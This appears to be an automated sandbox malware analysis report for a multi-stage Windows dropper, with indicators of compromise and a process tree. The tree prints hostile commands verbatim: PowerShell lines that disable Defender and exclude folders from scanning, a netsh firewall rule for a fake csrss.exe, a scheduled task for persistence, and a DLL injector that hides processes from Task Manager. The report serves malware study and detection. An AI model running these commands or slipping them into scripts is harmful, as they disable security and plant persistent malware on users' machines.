Creates scheduled task(s) 1 TTPs 9 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 10460 schtasks.exe 10448 schtasks.exe 8292 schtasks.exe 12072 schtasks.exe 3916 schtasks.exe 8484 schtasks.exe 10248 schtasks.exe 8476 schtasks.exe 2176 schtasks.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 22320 tasklist.exe 23904 tasklist.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
Install.exeInstall.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 1564 taskkill.exe 1572 taskkill.exe 8292 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
csrss.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" csrss.exe -
Modifies registry class 1 IoCs
Processes:
UoebYjish2W0eboo9MSvTsGU.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings UoebYjish2W0eboo9MSvTsGU.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs ping.exe 1 TTPs 2 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 309 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exeWed2135bd1920.exepid process 3996 powershell.exe 3996 powershell.exe 1216 powershell.exe 1216 powershell.exe 1212 Wed2135bd1920.exe 1212 Wed2135bd1920.exe 3996 powershell.exe 3996 powershell.exe 1216 powershell.exe 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 652 -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
Wed2135bd1920.exem76D27Rc3RtyxWBYhsjGBluV.exeft04DOugAN_yRClQPKogVWyi.exepid process 1212 Wed2135bd1920.exe 5012 m76D27Rc3RtyxWBYhsjGBluV.exe 8504 ft04DOugAN_yRClQPKogVWyi.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Wed214fc5ff02b7.exepowershell.exepowershell.exeWed218c3c4f53dbe01.exeWed21d25f5841.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 4280 Wed214fc5ff02b7.exe Token: SeDebugPrivilege 3996 powershell.exe Token: SeDebugPrivilege 1216 powershell.exe Token: SeCreateTokenPrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeAssignPrimaryTokenPrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeLockMemoryPrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeIncreaseQuotaPrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeMachineAccountPrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeTcbPrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeSecurityPrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeTakeOwnershipPrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeLoadDriverPrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeSystemProfilePrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeSystemtimePrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeProfSingleProcessPrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeIncBasePriorityPrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeCreatePagefilePrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeCreatePermanentPrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeBackupPrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeRestorePrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeShutdownPrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeDebugPrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeAuditPrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeSystemEnvironmentPrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeChangeNotifyPrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeRemoteShutdownPrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeUndockPrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeSyncAgentPrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeEnableDelegationPrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeManageVolumePrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeImpersonatePrivilege 4572 Wed218c3c4f53dbe01.exe Token: SeCreateGlobalPrivilege 4572 Wed218c3c4f53dbe01.exe Token: 31 4572 Wed218c3c4f53dbe01.exe Token: 32 4572 Wed218c3c4f53dbe01.exe Token: 33 4572 Wed218c3c4f53dbe01.exe Token: 34 4572 Wed218c3c4f53dbe01.exe Token: 35 4572 Wed218c3c4f53dbe01.exe Token: SeDebugPrivilege 2472 Wed21d25f5841.exe Token: SeDebugPrivilege 1564 taskkill.exe Token: SeDebugPrivilege 1572 taskkill.exe Token: SeShutdownPrivilege 652 Token: SeCreatePagefilePrivilege 652 Token: SeShutdownPrivilege 652 Token: SeCreatePagefilePrivilege 652 Token: SeShutdownPrivilege 652 Token: SeCreatePagefilePrivilege 652 Token: SeShutdownPrivilege 652 Token: SeCreatePagefilePrivilege 652 Token: SeShutdownPrivilege 652 Token: SeCreatePagefilePrivilege 652 Token: SeShutdownPrivilege 652 Token: SeCreatePagefilePrivilege 652 Token: SeShutdownPrivilege 652 Token: SeCreatePagefilePrivilege 652 Token: SeShutdownPrivilege 652 Token: SeCreatePagefilePrivilege 652 Token: SeShutdownPrivilege 652 Token: SeCreatePagefilePrivilege 652 Token: SeShutdownPrivilege 652 Token: SeCreatePagefilePrivilege 652 Token: SeShutdownPrivilege 652 Token: SeCreatePagefilePrivilege 652 Token: SeShutdownPrivilege 652 Token: SeCreatePagefilePrivilege 652 -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
joDqge54Tv9NCgW49aAyCCam.tmppid process 9600 joDqge54Tv9NCgW49aAyCCam.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
5A5158C712E1588C621124B5DC4B0C3EBFC064FFC0E2C.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 368 wrote to memory of 4456 368 5A5158C712E1588C621124B5DC4B0C3EBFC064FFC0E2C.exe setup_install.exe PID 368 wrote to memory of 4456 368 5A5158C712E1588C621124B5DC4B0C3EBFC064FFC0E2C.exe setup_install.exe PID 368 wrote to memory of 4456 368 5A5158C712E1588C621124B5DC4B0C3EBFC064FFC0E2C.exe setup_install.exe PID 4456 wrote to memory of 4180 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 4180 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 4180 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 4992 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 4992 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 4992 4456 setup_install.exe cmd.exe PID 4992 wrote to memory of 3996 4992 cmd.exe powershell.exe PID 4992 wrote to memory of 3996 4992 cmd.exe powershell.exe PID 4992 wrote to memory of 3996 4992 cmd.exe powershell.exe PID 4456 wrote to memory of 1032 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 1032 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 1032 4456 setup_install.exe cmd.exe PID 4180 wrote to memory of 1216 4180 cmd.exe powershell.exe PID 4180 wrote to memory of 1216 4180 cmd.exe powershell.exe PID 4180 wrote to memory of 1216 4180 cmd.exe powershell.exe PID 4456 wrote to memory of 2716 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 2716 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 2716 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 4188 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 4188 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 4188 4456 setup_install.exe cmd.exe PID 2716 wrote to memory of 3140 2716 cmd.exe Wed2181d5a4917c14c3.exe PID 2716 wrote to memory of 3140 2716 cmd.exe Wed2181d5a4917c14c3.exe PID 2716 wrote to memory of 3140 2716 cmd.exe Wed2181d5a4917c14c3.exe PID 4456 wrote to memory of 3752 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 3752 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 3752 4456 setup_install.exe cmd.exe PID 1032 wrote to memory of 3468 1032 cmd.exe Wed214b8335df03a0f.exe PID 1032 wrote to memory of 3468 1032 cmd.exe Wed214b8335df03a0f.exe PID 1032 wrote to memory of 3468 1032 cmd.exe Wed214b8335df03a0f.exe PID 4456 wrote to memory of 3700 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 3700 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 3700 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 2960 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 2960 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 2960 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 4016 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 4016 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 4016 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 2520 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 2520 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 2520 4456 setup_install.exe cmd.exe PID 3700 wrote to memory of 880 3700 cmd.exe Wed21ea78c748a30684.exe PID 3700 wrote to memory of 880 3700 cmd.exe Wed21ea78c748a30684.exe PID 3700 wrote to memory of 880 3700 cmd.exe Wed21ea78c748a30684.exe PID 4016 wrote to memory of 4872 4016 cmd.exe Wed214f6ccf7c811f9d.exe PID 4016 wrote to memory of 4872 4016 cmd.exe Wed214f6ccf7c811f9d.exe PID 4016 wrote to memory of 4872 4016 cmd.exe Wed214f6ccf7c811f9d.exe PID 4456 wrote to memory of 2912 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 2912 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 2912 4456 setup_install.exe cmd.exe PID 3752 wrote to memory of 4280 3752 cmd.exe Wed214fc5ff02b7.exe PID 3752 wrote to memory of 4280 3752 cmd.exe Wed214fc5ff02b7.exe PID 4188 wrote to memory of 4460 4188 cmd.exe Wed21f7d3c36e7eaeca0.exe PID 4188 wrote to memory of 4460 4188 cmd.exe Wed21f7d3c36e7eaeca0.exe PID 4188 wrote to memory of 4460 4188 cmd.exe Wed21f7d3c36e7eaeca0.exe PID 2960 wrote to memory of 3664 2960 cmd.exe Wed2146da156ae.exe PID 2960 wrote to memory of 3664 2960 cmd.exe Wed2146da156ae.exe PID 4456 wrote to memory of 2016 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 2016 4456 setup_install.exe cmd.exe PID 4456 wrote to memory of 2016 4456 setup_install.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\5A5158C712E1588C621124B5DC4B0C3EBFC064FFC0E2C.exe"C:\Users\Admin\AppData\Local\Temp\5A5158C712E1588C621124B5DC4B0C3EBFC064FFC0E2C.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS07147A86\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS07147A86\setup_install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed2181d5a4917c14c3.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed2181d5a4917c14c3.exeWed2181d5a4917c14c3.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed2181d5a4917c14c3.exe"C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed2181d5a4917c14c3.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /306-3066⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f7⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed21c787120ecdf176.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21c787120ecdf176.exeWed21c787120ecdf176.exe4⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21c787120ecdf176.exe"C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21c787120ecdf176.exe" -u5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed214f6ccf7c811f9d.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed2146da156ae.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed2146da156ae.exeWed2146da156ae.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed21ea78c748a30684.exe /mixtwo3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed214fc5ff02b7.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed214fc5ff02b7.exeWed214fc5ff02b7.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed21f7d3c36e7eaeca0.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21f7d3c36e7eaeca0.exeWed21f7d3c36e7eaeca0.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21f7d3c36e7eaeca0.exeC:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21f7d3c36e7eaeca0.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed214b8335df03a0f.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed21e08690b2d5.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21e08690b2d5.exeWed21e08690b2d5.exe4⤵
- Executes dropped EXE
- Checks computer location settings
-
